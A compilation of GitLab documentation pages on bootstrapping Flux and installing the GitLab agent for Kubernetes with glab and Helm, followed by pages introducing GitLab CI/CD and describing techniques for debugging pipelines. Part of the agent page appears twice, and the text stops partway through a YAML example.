Flux is installed on your cluster, and the necessary Flux configuration files are committed to `manifests/flux-system`, which syncs Flux and the entire `manifests` directory. Because the workloads (the `Namespace` and `Deployment` manifests) are already declared in the `manifests` directory, there is no extra work involved.

For more information about configuring Flux with GitLab, see [Tutorial: Set up Flux for GitOps](../getting_started.md).

## Troubleshooting

### `flux bootstrap` doesn't reconcile manifests correctly

The `flux bootstrap` command creates a `kustomizations.kustomize.toolkit.fluxcd.io` resource that points to the `manifests` directory. This resource applies to all the Kubernetes manifests in the directory, without requiring a [Kustomization file](https://kubectl.docs.kubernetes.io/references/kustomize/glossary/#kustomization). This process might not work with your configuration.

To troubleshoot, review the Flux Kustomization status for potential issues:

```shell
kubectl get kustomizations.kustomize.toolkit.fluxcd.io -n flux-system
```

### Use a `default_namespace` in the agent configuration

You might encounter an issue if your legacy agent-based GitOps setup refers to a `default_namespace` in the agent configuration, but omits this namespace in the manifests themselves. This causes an error where your bootstrapped Flux doesn't know that your existing manifests are applied to the `default_namespace`.

To solve this issue, choose one of the following approaches:

- Set the namespace manually in your previously existing resource YAML.
- Move your resources into a dedicated directory, and point Flux at it with `kustomize.toolkit.fluxcd.io/Kustomization`, where `spec.targetNamespace` specifies the namespace.
- Move the resources into a subdirectory and add a `kustomization.yaml` file that sets the `namespace` property.
If you prefer to move the resources outside the path already configured for Flux, you should use `kustomize.toolkit.fluxcd.io/Kustomization`. If you prefer to move the resources into a subdirectory of a path already watched by Flux, you should use a `kustomize.config.k8s.io/Kustomization`.
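For the subdirectory approach, a minimal `kustomization.yaml` sketch might look like the following; the directory layout and the resource file name are illustrative, and `production` stands in for whatever your `default_namespace` was:

```yaml
# manifests/app/kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
namespace: production   # the namespace previously supplied by default_namespace
resources:
  - deployment.yaml
```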
# Installing the agent for Kubernetes

Source: <https://docs.gitlab.com/user/clusters/agent/install>
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

To connect a Kubernetes cluster to GitLab, you must install an agent in your cluster.

## Prerequisites

Before you can install the agent in your cluster, you need:

- An existing [Kubernetes cluster that you can connect to from your local terminal](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/). If you don't have a cluster, you can create one on a cloud provider, like:
  - [Amazon Elastic Kubernetes Service (EKS)](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html)
  - [Azure Kubernetes Service (AKS)](https://learn.microsoft.com/en-us/azure/aks/what-is-aks)
  - [Digital Ocean](https://docs.digitalocean.com/products/kubernetes/getting-started/quickstart/)
  - [Google Kubernetes Engine (GKE)](https://cloud.google.com/kubernetes-engine/docs/deploy-app-cluster)
- You should use [Infrastructure as Code techniques](../../../infrastructure/iac/_index.md) for managing infrastructure resources at scale.
- Access to an agent server:
  - On GitLab.com, the agent server is available at `wss://kas.gitlab.com`.
  - On GitLab Self-Managed, a GitLab administrator must set up the [agent server](../../../../administration/clusters/kas.md). Then it is available by default at `wss://gitlab.example.com/-/kubernetes-agent/`.
  - On GitLab Dedicated, the agent server is available at `wss://kas.<instance-domain>`, for example `wss://kas.example.gitlab-dedicated.com`. If you use a [custom hostname](../../../../administration/dedicated/configure_instance/network_security.md#bring-your-own-domain-byod) for your GitLab Dedicated instance, you can also choose a custom hostname for the KAS service.

## Bootstrap the agent with Flux support (recommended)

You can install the agent by bootstrapping it with the [GitLab CLI (`glab`)](../../../../editor_extensions/gitlab_cli/_index.md) and Flux.

Prerequisites:

- You have the following command-line tools installed:
  - `glab`
  - `kubectl`
  - `flux`
- You have a local cluster connection that works with `kubectl` and `flux`.
- You [bootstrapped Flux](https://fluxcd.io/flux/installation/bootstrap/gitlab/) into the cluster with `flux bootstrap`.
  - Make sure to bootstrap Flux and the agent in compatible directories. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command.

To install the agent, either:

- Run `glab cluster agent bootstrap` within the directory of the Git repository of your target project:

  ```shell
  glab cluster agent bootstrap <agent-name> --manifest-path <same_path_used_in_flux_bootstrap>
  ```

- Run `glab -R path-with-namespace cluster agent bootstrap` if you must run the command outside the Git repository of your target project:

  ```shell
  glab -R <full/path/to/project> cluster agent bootstrap <agent-name> --manifest-path <same_path_used_in_flux_bootstrap>
  ```

By default, the command:

1. Registers the agent.
1. Configures the agent.
1. Configures an environment with a dashboard for the agent.
1. Creates an agent token.
1. In the cluster, creates a Kubernetes secret with the agent token.
1. Commits the Flux Helm resources to the Git repository.
1. Triggers a Flux reconciliation.

For customization options, run `glab cluster agent bootstrap --help`. You probably want to use at least the `--path <flux_manifests_directory>` option.

## Install the agent manually

It takes three steps to install the agent in your cluster:

1. Optional. [Create an agent configuration file](#create-an-agent-configuration-file).
1. [Register the agent with GitLab](#register-the-agent-with-gitlab).
1. [Install the agent in your cluster](#install-the-agent-in-the-cluster).

<i class="fa fa-youtube-play youtube" aria-hidden="true"></i>
Watch a [walk-through of this process](https://www.youtube.com/watch?v=XuBpKtsgGkE).
<!-- Video published on 2021-09-02 -->

### Create an agent configuration file

For configuration settings, the agent uses a YAML file in the GitLab project. Adding an agent configuration file is optional. You must create this file if:

- You use [a GitLab CI/CD workflow](../ci_cd_workflow.md#use-gitlab-cicd-with-your-cluster) and want to authorize a different project or group to access the agent.
- You [allow specific project or group members to access Kubernetes](../user_access.md).

To create an agent configuration file:

1. Choose a name for your agent. The agent name follows the [DNS label standard from RFC 1123](https://www.rfc-editor.org/rfc/rfc1123). The name must:

   - Be unique in the project.
   - Contain at most 63 characters.
   - Contain only lowercase alphanumeric characters or `-`.
   - Start with an alphanumeric character.
   - End with an alphanumeric character.

1. In the repository, in the default branch, create an agent configuration file at:

   ```plaintext
   .gitlab/agents/<agent-name>/config.yaml
   ```

   You can leave the file blank for now, and [configure it](../work_with_agent.md#configure-your-agent) later.

### Register the agent with GitLab

#### Option 1: Agent connects to GitLab

You can create a new agent record directly from the GitLab UI. The agent can be registered without creating an agent configuration file. You must register an agent before you can install the agent in your cluster.

To register an agent:

1. On the left sidebar, select **Search or go to** and find your project. If you have an [agent configuration file](#create-an-agent-configuration-file), it must be in this project. Your cluster manifest files should also be in this project.
1. Select **Operate > Kubernetes clusters**.
1. Select **Connect a cluster (agent)**.
1. In the **Name of new agent** field, enter a unique name for your agent.
   - If an [agent configuration file](#create-an-agent-configuration-file) with this name already exists, it is used.
   - If no configuration exists for this name, a new agent is created with the default configuration.
1. Select **Create and register**.
1. GitLab generates an access token for the agent. You need this token to install the agent in your cluster.

   {{< alert type="warning" >}}

   Securely store the agent access token. A bad actor can use this token to access source code in the agent's configuration project, access source code in any public project on the GitLab instance, or even, under very specific conditions, obtain a Kubernetes manifest.

   {{< /alert >}}

1. Copy the command under **Recommended installation method**. You need it when you use the one-liner installation method to install the agent in your cluster.

#### Option 2: GitLab connects to agent (receptive agent)

{{< details >}}

- Tier: Ultimate
- Offering: GitLab Self-Managed

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/12180) in GitLab 17.4.

{{< /history >}}

{{< alert type="note" >}}

The GitLab Agent Helm Chart release does not fully support mTLS authentication. You should authenticate with the JWT method instead. Support for mTLS is tracked in [issue 64](https://gitlab.com/gitlab-org/charts/gitlab-agent/-/issues/64).

{{< /alert >}}

[Receptive agents](../_index.md#receptive-agents) allow GitLab to integrate with Kubernetes clusters that cannot establish a network connection to the GitLab instance, but can be connected to by GitLab.

1. Follow the steps in option 1 to register an agent in your cluster. Save the agent token and install command for later, but don't install the agent yet.
1. Prepare an authentication method. The GitLab-to-agent connection can be cleartext gRPC (`grpc://`) or encrypted gRPC (`grpcs://`, recommended). GitLab can authenticate to the agent in your cluster using:
   - A JWT token. Available in both `grpc://` and `grpcs://` configurations. You don't need to generate client certificates with this method.
1. Add a URL configuration to the agent with the [cluster agents API](../../../../api/cluster_agents.md#create-an-agent-url-configuration). If you delete the URL configuration, the receptive agent becomes an ordinary agent. You can associate a receptive agent with only one URL configuration at a time.
1. Install the agent into the cluster. Use the command you copied when you registered the agent, but remove the `--set config.kasAddress=...` parameter.

   The following JWT token authentication example adds the `config.receptive.enabled=true` and `config.api.jwtPublicKey` settings:

   ```shell
   helm repo add gitlab https://charts.gitlab.io
   helm repo update
   helm upgrade --install my-agent gitlab/gitlab-agent \
     --namespace ns \
     --create-namespace \
     --set config.token=.... \
     --set config.receptive.enabled=true \
     --set config.api.jwtPublicKey=<public_key from the response>
   ```

It might take up to 10 minutes for GitLab to start trying to establish a connection to the new agent.

### Install the agent in the cluster

To connect your cluster to GitLab, [install the registered agent with Helm](#install-the-agent-with-helm). To install a receptive agent, follow the steps in [GitLab connects to agent (receptive agent)](#option-2-gitlab-connects-to-agent-receptive-agent).

{{< alert type="note" >}}

To connect to multiple clusters, you must configure, register, and install an agent in each cluster. Make sure to give each agent a unique name.

{{< /alert >}}

#### Install the agent with Helm

{{< alert type="warning" >}}

For simplicity, the default Helm chart configuration sets up a service account for the agent with `cluster-admin` rights. You should not use this on production systems. To deploy to a production system, follow the instructions in [Customize the Helm installation](#customize-the-helm-installation) to create a service account with the minimum permissions required for your deployment and specify that during installation.

{{< /alert >}}

To install the agent on your cluster using Helm:

1. [Install the Helm CLI](https://helm.sh/docs/intro/install/).
1. On your computer, open a terminal and [connect to your cluster](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/).
1. Run the command you copied when you [registered your agent with GitLab](#register-the-agent-with-gitlab). The command should look like:

   ```shell
   helm repo add gitlab https://charts.gitlab.io
   helm repo update
   helm upgrade --install test gitlab/gitlab-agent \
     --namespace gitlab-agent-test \
     --create-namespace \
     --set image.tag=<current agentk version> \
     --set config.token=<your_token> \
     --set config.kasAddress=<address_to_GitLab_KAS_instance>
   ```

1. Optional. [Customize the Helm installation](#customize-the-helm-installation). If you install the agent on a production system, you should customize the Helm installation to restrict the permissions of the service account. Related customization options are described below.

##### Customize the Helm installation

By default, the Helm installation command generated by GitLab:

- Creates a namespace `gitlab-agent` for the deployment (`--namespace gitlab-agent`). You can skip creating the namespace by omitting the `--create-namespace` flag.
- Sets up a service account for the agent and assigns it the `cluster-admin` role. You can:
  - Skip creating the service account by adding `--set serviceAccount.create=false` to the `helm install` command. In this case, you must set `serviceAccount.name` to a pre-existing service account.
  - Customize the role assigned to the service account by adding `--set rbac.useExistingRole <your role name>` to the `helm install` command. In this case, you should have a pre-created role with restricted permissions that can be used by the service account.
  - Skip role assignment altogether by adding `--set rbac.create=false` to your `helm install` command. In this case, you must create the `ClusterRoleBinding` manually.
- Creates a `Secret` resource for the agent's access token. To bring your own secret with a token instead, omit the token (`--set config.token=...`) and use `--set config.secretName=<your secret name>`.
- Creates a `Deployment` resource for the `agentk` pod.

To see the full list of customizations available, see the Helm chart's [README](https://gitlab.com/gitlab-org/charts/gitlab-agent/-/blob/main/README.md#values).

##### Use the agent when KAS is behind a self-signed certificate

When [KAS](../../../../administration/clusters/kas.md) is behind a self-signed certificate, you can set the value of `config.kasCaCert` to the certificate. For example:

```shell
helm upgrade --install gitlab-agent gitlab/gitlab-agent \
  --set-file config.kasCaCert=my-custom-ca.pem
```

In this example, `my-custom-ca.pem` is the path to a local file that contains the CA certificate used by KAS. The certificate is automatically stored in a config map and mounted in the `agentk` pod.

If KAS is installed with the GitLab chart, and the chart is configured to provide an [auto-generated self-signed wildcard certificate](https://docs.gitlab.com/charts/installation/tls.html#option-4-use-auto-generated-self-signed-wildcard-certificate), you can extract the CA certificate from the `RELEASE-wildcard-tls-ca` secret.

##### Use the agent behind an HTTP proxy

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/351867) in GitLab 15.0, the GitLab agent Helm chart supports setting environment variables.

{{< /history >}}

To configure an HTTP proxy when using the Helm chart, you can use the environment variables `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`. Upper and lowercase are both acceptable.

You can set these variables by using the `extraEnv` value, as a list of objects with keys `name` and `value`.
For example, to set only the environment variable `HTTPS_PROXY` to the value `https://example.com/proxy`, you can run:

```shell
helm upgrade --install gitlab-agent gitlab/gitlab-agent \
  --set extraEnv[0].name=HTTPS_PROXY \
  --set extraEnv[0].value=https://example.com/proxy \
  ...
```

{{< alert type="note" >}}

DNS rebind protection is disabled when either the `HTTP_PROXY` or the `HTTPS_PROXY` environment variable is set, and the domain DNS can't be resolved.

{{< /alert >}}

## Install multiple agents in your cluster

{{< alert type="note" >}}

In most cases, you should run one agent per cluster and use the agent impersonation features (Premium and Ultimate only) to support multi-tenancy. If you must run multiple agents, we would love to hear from you about any issues you encounter. You can provide your feedback in [issue 454110](https://gitlab.com/gitlab-org/gitlab/-/issues/454110).

{{< /alert >}}

To install a second agent in your cluster, you can follow the [previous steps](#register-the-agent-with-gitlab) a second time. To avoid resource name collisions within the cluster, you must either:

- Use a different release name for the agent, for example, `second-gitlab-agent`:

  ```shell
  helm upgrade --install second-gitlab-agent gitlab/gitlab-agent ...
  ```

- Or, install the agent in a different namespace, for example, `different-namespace`:

  ```shell
  helm upgrade --install gitlab-agent gitlab/gitlab-agent \
    --namespace different-namespace \
    ...
  ```

Because each agent in a cluster runs independently, reconciliations are triggered by every agent with the Flux module enabled. [Issue 357516](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) proposes to change this behavior. As a workaround, you can:

- Configure RBAC with the agent so that it only accesses the Flux resources it needs.
- Disable the Flux module on the agents that don't use it.

## Example projects

The following example projects can help you get started with the agent.

- [Distinct application and manifest repository example](https://gitlab.com/gitlab-examples/ops/gitops-demo/hello-world-service-gitops)
- [Auto DevOps setup that uses the CI/CD workflow](https://gitlab.com/gitlab-examples/ops/gitops-demo/hello-world-service)
- [Cluster management project template example that uses the CI/CD workflow](https://gitlab.com/gitlab-examples/ops/gitops-demo/cluster-management)

## Updates and version compatibility

GitLab warns you on the agent's list page to update the agent version installed on your cluster.

For the best experience, the version of the agent installed in your cluster should match the GitLab major and minor version. The previous and next minor versions are also supported. For example, if your GitLab version is v14.9.4 (major version 14, minor version 9), then versions v14.9.0 and v14.9.1 of the agent are ideal, but any v14.8.x or v14.10.x version of the agent is also supported. See [the release page](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/releases) of the GitLab agent for Kubernetes.

### Update the agent version

{{< alert type="note" >}}

Instead of using `--reuse-values`, you should specify all needed values. If you use `--reuse-values`, you might miss new defaults or use deprecated values. To retrieve previous `--set` arguments, use `helm get values <release name>`. You can save the values to a file with `helm get values gitlab-agent > agent.yaml`, and pass the file to Helm with `-f`: `helm upgrade gitlab-agent gitlab/gitlab-agent -f agent.yaml`. This safely replaces the behavior of `--reuse-values`.

{{< /alert >}}

To update the agent to the latest version, you can run:

```shell
helm repo update
helm upgrade --install gitlab-agent gitlab/gitlab-agent \
  --namespace gitlab-agent
```

To set a specific version, you can override the `image.tag` value. For example, to install version `v14.9.1`, run:

```shell
helm upgrade gitlab-agent gitlab/gitlab-agent \
  --namespace gitlab-agent \
  --set image.tag=v14.9.1
```

The Helm chart is updated separately from the agent for Kubernetes, and might occasionally lag behind the latest version of the agent. If you run `helm repo update` and don't specify an image tag, your agent runs the version specified in the chart.

To use the latest release of the agent for Kubernetes, set the image tag to match the most recent agent image.

## Uninstall the agent

If you [installed the agent with Helm](#install-the-agent-with-helm), then you can also uninstall with Helm. For example, if the release and namespace are both called `gitlab-agent`, you can uninstall the agent using the following command:

```shell
helm uninstall gitlab-agent \
  --namespace gitlab-agent
```

## Troubleshooting

When you install the agent for Kubernetes, you might encounter the following issues.

### Error: `failed to reconcile the GitLab Agent`

If the `glab cluster agent bootstrap` command fails with the message `failed to reconcile the GitLab Agent`, it means `glab` couldn't reconcile the agent with Flux.

This error might be because:

- The Flux setup doesn't point to the directory where `glab` put the Flux manifests for the agent. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command.
- Flux points to the root directory of a project without a `kustomization.yaml`, which causes Flux to traverse subdirectories looking for YAML files. To use the agent, you must have an agent configuration file at `.gitlab/agents/<agent-name>/config.yaml`, which is not a valid Kubernetes manifest. Flux fails to apply this file, which causes an error. To resolve, you should point Flux at a subdirectory instead of the root.
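To point Flux at a subdirectory, you can update the Flux `Kustomization` object with the Flux CLI. The following is a sketch, not a definitive command for your setup: it assumes a default `flux bootstrap` layout where the root Kustomization and its `GitRepository` source are both named `flux-system` in the `flux-system` namespace, and `./manifests` is an illustrative subdirectory. Adjust the names and path to match your cluster:

```shell
# Illustrative example: re-point the root Flux Kustomization at the
# ./manifests subdirectory instead of the repository root.
flux create kustomization flux-system \
  --namespace=flux-system \
  --source=GitRepository/flux-system \
  --path="./manifests" \
  --prune=true \
  --interval=10m
```

`flux create` applies the object to the cluster, so running it against an existing Kustomization updates it in place. Remember to commit the same change to the Kustomization manifest in your Git repository, or Flux reconciles it back to the old path.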
You can save the values to a file with `helm get values gitlab-agent > agent.yaml`, and pass the file to Helm with `-f`: `helm upgrade gitlab-agent gitlab/gitlab-agent -f agent.yaml`. This safely replaces the behavior of `--reuse-values`. {{< /alert >}} To update the agent to the latest version, you can run: ```shell helm repo update helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --namespace gitlab-agent ``` To set a specific version, you can override the `image.tag` value. For example, to install version `v14.9.1`, run: ```shell helm upgrade gitlab-agent gitlab/gitlab-agent \ --namespace gitlab-agent \ --set image.tag=v14.9.1 ``` The Helm chart is updated separately from the agent for Kubernetes, and might occasionally lag behind the latest version of the agent. If you run `helm repo update` and don't specify an image tag, your agent runs the version specified in the chart. To use the latest release of the agent for Kubernetes, set the image tag to match the most recent agent image. ## Uninstall the agent If you [installed the agent with Helm](#install-the-agent-with-helm), then you can also uninstall with Helm. For example, if the release and namespace are both called `gitlab-agent`, then you can uninstall the agent using the following command: ```shell helm uninstall gitlab-agent \ --namespace gitlab-agent ``` ## Troubleshooting When you install the agent for Kubernetes, you might encounter the following issues. ### Error: `failed to reconcile the GitLab Agent` If the `glab cluster agent bootstrap` command fails with the message `failed to reconcile the GitLab Agent`, it means `glab` couldn't reconcile the agent with Flux. This error might be because: - The Flux setup doesn't point to the directory where `glab` put the Flux manifests for the agent. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command. 
- Flux points to the root directory of a project without a `kustomization.yaml`, which causes Flux to traverse subdirectories looking for YAML files. To use the agent, you must have an agent configuration file at `.gitlab/agents/<agent-name>/config.yaml`, which is not a valid Kubernetes manifest. Flux fails to apply this file, which causes an error. To resolve, you should point Flux at a subdirectory instead of the root.
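As a sketch, the two commands might pair up like this. All names and paths below are hypothetical:

```shell
# Bootstrap Flux, storing its manifests under clusters/my-cluster:
flux bootstrap gitlab \
  --owner=my-group \
  --repository=my-cluster-repo \
  --path=clusters/my-cluster

# Bootstrap the agent into the same directory that Flux watches:
glab cluster agent bootstrap my-agent \
  --manifest-path=clusters/my-cluster
```

The key point is that `--manifest-path` matches the `--path` given to Flux, so the agent manifests land in a directory Flux actually reconciles.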
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Build and test your application.
title: Get started with GitLab CI/CD
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD is a continuous method of software development, where you continuously build, test, deploy, and monitor iterative code changes. This iterative process helps reduce the chance that you develop new code based on buggy or failed previous versions. GitLab CI/CD can catch bugs early in the development cycle, and help ensure that the code deployed to production complies with your established code standards. This process is part of a larger workflow: ![GitLab DevSecOps lifecycle with stages for Plan, Create, Verify, Secure, Release, and Monitor.](img/get_started_cicd_v16_11.png) ## Step 1: Create a `.gitlab-ci.yml` file To use GitLab CI/CD, you start with a `.gitlab-ci.yml` file at the root of your project. This file specifies the stages, jobs, and scripts to be executed during your CI/CD pipeline. It is a YAML file with its own custom syntax. In this file, you define variables, dependencies between jobs, and specify when and how each job should be executed. You can name this file anything you want, but `.gitlab-ci.yml` is the most common name, and the product documentation refers to it as the `.gitlab-ci.yml` file or the CI/CD configuration file. For more information, see: - [Tutorial: Create your first `.gitlab-ci.yml` file](quick_start/_index.md) - [The CI/CD YAML syntax reference](yaml/_index.md), which lists all possible keywords - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [Continuous Integration overview](https://www.youtube-nocookie.com/embed/eyr5YnkWq_I) - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [Continuous Delivery overview](https://www.youtube-nocookie.com/embed/M7rBDZYsx8U) - [Basics of CI blog](https://about.gitlab.com/blog/2020/12/10/basics-of-gitlab-ci-updated/) ## Step 2: Find or create runners Runners are the agents that run your jobs. 
These agents can run on physical machines or virtual instances. In your `.gitlab-ci.yml` file, you can specify a container image you want to use when running the job. The runner loads the image, clones your project, and runs the job either locally or in the container.

If you use GitLab.com, runners on Linux, Windows, and macOS are already available for use. And you can register your own runners on GitLab.com if you'd like.

If you don't use GitLab.com, you can:

- Register runners or use runners already registered for your GitLab Self-Managed instance.
- Create a runner on your local machine.

For more information, see:

- [Create a runner on your local machine](../tutorials/create_register_first_runner/_index.md)
- [More information about runners](https://docs.gitlab.com/runner/)

## Step 3: Define your pipelines

A pipeline is what you're defining in the `.gitlab-ci.yml` file, and is what happens when the contents of the file are run on a runner.

Pipelines are made up of jobs and stages:

- Stages define the order of execution. Typical stages might be `build`, `test`, and `deploy`.
- Jobs specify the tasks to be performed in each stage. For example, a job can compile or test code.

Pipelines can be triggered by various events, like commits or merges, or can run on a schedule. In your pipeline, you can integrate with a wide range of tools and platforms.

For more information, see:

- [Pipeline editor](pipeline_editor/_index.md), which you use to edit your configuration
- [Visualize your pipeline](pipeline_editor/_index.md#visualize-ci-configuration)
- [Pipelines](pipelines/_index.md)

## Step 4: Use CI/CD variables as part of jobs

GitLab CI/CD variables are key-value pairs you use to store and pass configuration settings and sensitive information, like passwords or API keys, to jobs in a pipeline.

Use CI/CD variables to customize jobs by making values defined elsewhere accessible to jobs.
You can hard-code CI/CD variables in your `.gitlab-ci.yml` file, set them in your project settings, or generate them dynamically. You can define them for the project, group, or instance. Two types of variables exist: custom variables and predefined. - Custom variables are user-defined. Create and manage them in the GitLab UI, API, or in configuration files. - Predefined variables are automatically set by GitLab and provide information about the current job, pipeline, and environment. Variables can be marked as "protected" or "masked" for added security. - Protected variables are only available to jobs running on protected branches or tags. - Masked variables have their values hidden in job logs to prevent sensitive information from being exposed. For more information, see: - [CI/CD variables](variables/_index.md) - [Dynamically generated predefined variables](variables/predefined_variables.md) ## Step 5: Use CI/CD components A CI/CD component is a reusable pipeline configuration unit. Use a CI/CD component to compose an entire pipeline configuration or a small part of a larger pipeline. You can add a component to your pipeline configuration with `include:component`. Reusable components help reduce duplication, improve maintainability, and promote consistency across projects. Create a component project and publish it to the CI/CD Catalog to share your component across multiple projects. GitLab also has CI/CD component templates for common tasks and integrations. For more information, see: - [CI/CD components](components/_index.md)
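The steps above can be sketched in one minimal `.gitlab-ci.yml`. The stage names, job names, and variable below are illustrative:

```yaml
stages:          # Step 3: stages define the order of execution
  - build
  - test

variables:       # Step 4: a custom, hard-coded CI/CD variable
  GREETING: "Hello, GitLab CI"

build-job:
  stage: build
  script:        # Runs on a runner (Step 2)
    - echo "$GREETING from job $CI_JOB_NAME"       # CI_JOB_NAME is predefined

test-job:
  stage: test
  script:
    - echo "Testing commit $CI_COMMIT_SHORT_SHA"   # also predefined
```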
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Configuration validation, warnings, errors, and troubleshooting.
title: Debugging CI/CD pipelines
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides several tools to help make it easier to debug your CI/CD configuration. If you are unable to resolve pipeline issues, you can get help from: - The [GitLab community forum](https://forum.gitlab.com/) - GitLab [Support](https://about.gitlab.com/support/) If you are having issues with a specific CI/CD feature, see the related troubleshooting section for that feature: - [Caching](caching/_index.md#troubleshooting). - [CI/CD job tokens](jobs/ci_job_token.md#troubleshooting). - [Container registry](../user/packages/container_registry/troubleshoot_container_registry.md). - [Docker](docker/docker_build_troubleshooting.md). - [Downstream pipelines](pipelines/downstream_pipelines_troubleshooting.md). - [Environments](environments/_index.md#troubleshooting). - [GitLab Runner](https://docs.gitlab.com/runner/faq/). - [ID tokens](secrets/id_token_authentication.md#troubleshooting). - [Jobs](jobs/job_troubleshooting.md). - [Job artifacts](jobs/job_artifacts_troubleshooting.md). - [Merge request pipelines](pipelines/mr_pipeline_troubleshooting.md), [merged results pipelines](pipelines/merged_results_pipelines.md#troubleshooting), and [merge trains](pipelines/merge_trains.md#troubleshooting). - [Pipeline editor](pipeline_editor/_index.md#troubleshooting). - [Variables](variables/variables_troubleshooting.md). - [YAML `includes` keyword](yaml/includes.md#troubleshooting). - [YAML `script` keyword](yaml/script_troubleshooting.md). ## Debugging techniques ### Verify syntax An early source of problems can be incorrect syntax. The pipeline shows a `yaml invalid` badge and does not start running if any syntax or formatting problems are found. #### Edit `.gitlab-ci.yml` with the pipeline editor The [pipeline editor](pipeline_editor/_index.md) is the recommended editing experience (rather than the single file editor or the Web IDE). 
It includes: - Code completion suggestions that ensure you are only using accepted keywords. - Automatic syntax highlighting and validation. - The [CI/CD configuration visualization](pipeline_editor/_index.md#visualize-ci-configuration), a graphical representation of your `.gitlab-ci.yml` file. #### Edit `.gitlab-ci.yml` locally If you prefer to edit your pipeline configuration locally, you can use the GitLab CI/CD schema in your editor to verify basic syntax issues. Any [editor with Schemastore support](https://www.schemastore.org/json/#editors) uses the GitLab CI/CD schema by default. If you need to link to the schema directly, use this URL: ```plaintext https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/assets/javascripts/editor/schema/ci.json ``` To see the full list of custom tags covered by the CI/CD schema, check the latest version of the schema. #### Verify syntax with CI Lint tool You can use the [CI Lint tool](yaml/lint.md) to verify that the syntax of a CI/CD configuration snippet is correct. Paste in full `.gitlab-ci.yml` files or individual job configurations, to verify the basic syntax. When a `.gitlab-ci.yml` file is present in a project, you can also use the CI Lint tool to [simulate the creation of a full pipeline](yaml/lint.md#simulate-a-pipeline). It does deeper verification of the configuration syntax. ### Use pipeline names Use [`workflow:name`](yaml/_index.md#workflowname) to give names to all your pipeline types, which makes it easier to identify pipelines in the pipelines list. 
For example: ```yaml variables: PIPELINE_NAME: "Default pipeline name" workflow: name: '$PIPELINE_NAME' rules: - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' variables: PIPELINE_NAME: "Merge request pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule" && $PIPELINE_SCHEDULE_TYPE == "hourly_deploy"' variables: PIPELINE_NAME: "Hourly deployment pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule"' variables: PIPELINE_NAME: "Other scheduled pipeline" - if: '$CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH' variables: PIPELINE_NAME: "Default branch pipeline" - if: '$CI_COMMIT_BRANCH =~ /^\d{1,2}\.\d{1,2}-stable$/' variables: PIPELINE_NAME: "Stable branch pipeline" ``` ### CI/CD variables #### Verify variables A key part of troubleshooting CI/CD is to verify which variables are present in a pipeline, and what their values are. A lot of pipeline configuration is dependent on variables, and verifying them is one of the fastest ways to find the source of a problem. [Export the full list of variables](variables/variables_troubleshooting.md#list-all-variables) available in each problematic job. Check if the variables you expect are present, and check if their values are what you expect. #### Use variables to add flags to CLI commands You can define CI/CD variables that are not used in standard pipeline runs, but can be used for debugging on demand. If you add a variable like in the following example, you can add it during manual runs of the [pipeline](pipelines/_index.md#run-a-pipeline-manually) or [individual job](jobs/job_control.md#run-a-manual-job) to modify the command's behavior. For example: ```yaml my-flaky-job: variables: DEBUG_VARS: "" script: - my-test-command $DEBUG_VARS /test-dirs ``` In this example, `DEBUG_VARS` is blank by default in standard pipelines. If you need to debug the job's behavior, run the pipeline manually and set `DEBUG_VARS` to `--verbose` for additional output. 
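To support the variable checks described above, you can temporarily add a throwaway job that prints every variable available to it. The job name is illustrative; masked variables stay hidden in the log, but be careful with any unmasked secrets:

```yaml
print-all-vars:
  rules:
    - when: manual      # run only on demand
  script:
    - export | sort     # list all environment variables the job can see
  allow_failure: true   # don't block the rest of the pipeline
```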
### Dependencies Dependency-related issues are another common source of unexpected issues in pipelines. #### Verify dependency versions To validate that the correct versions of dependencies are being used in jobs, you can output them before running the main script commands. For example: ```yaml job: before_script: - node --version - yarn --version script: - my-javascript-tests.sh ``` #### Pin versions While you might want to always use the latest version of a dependency or image, an update could include breaking changes unexpectedly. Consider pinning key dependencies and images to avoid surprise changes. For example: ```yaml variables: ALPINE_VERSION: '3.18.6' job1: image: alpine:$ALPINE_VERSION # This will never change unexpectedly script: - my-test-script.sh job2: image: alpine:latest # This might suddenly change script: - my-test-script.sh ``` You should still regularly check the dependency and image updates, as there might be important security updates. Then you can manually update the version as part of a process that verifies the updated image or dependency still works with your pipeline. ### Verify job output #### Make output verbose If you use `--silent` to reduce the amount of output in a job log, it can make it difficult to identify what went wrong in a job. Additionally, consider using `--verbose` when possible, for additional details. ```yaml job1: script: - my-test-tool --silent # If this fails, it might be impossible to identify the issue. - my-other-test-tool --verbose # This command will likely be easier to debug. ``` #### Save output and reports as artifacts Some tools might generate files that are only needed while the job is running, but the content of these files could be used for debugging. 
You can save them for later analysis with [`artifacts`](yaml/_index.md#artifacts):

```yaml
job1:
  script:
    - my-tool --json-output my-output.json
  artifacts:
    paths:
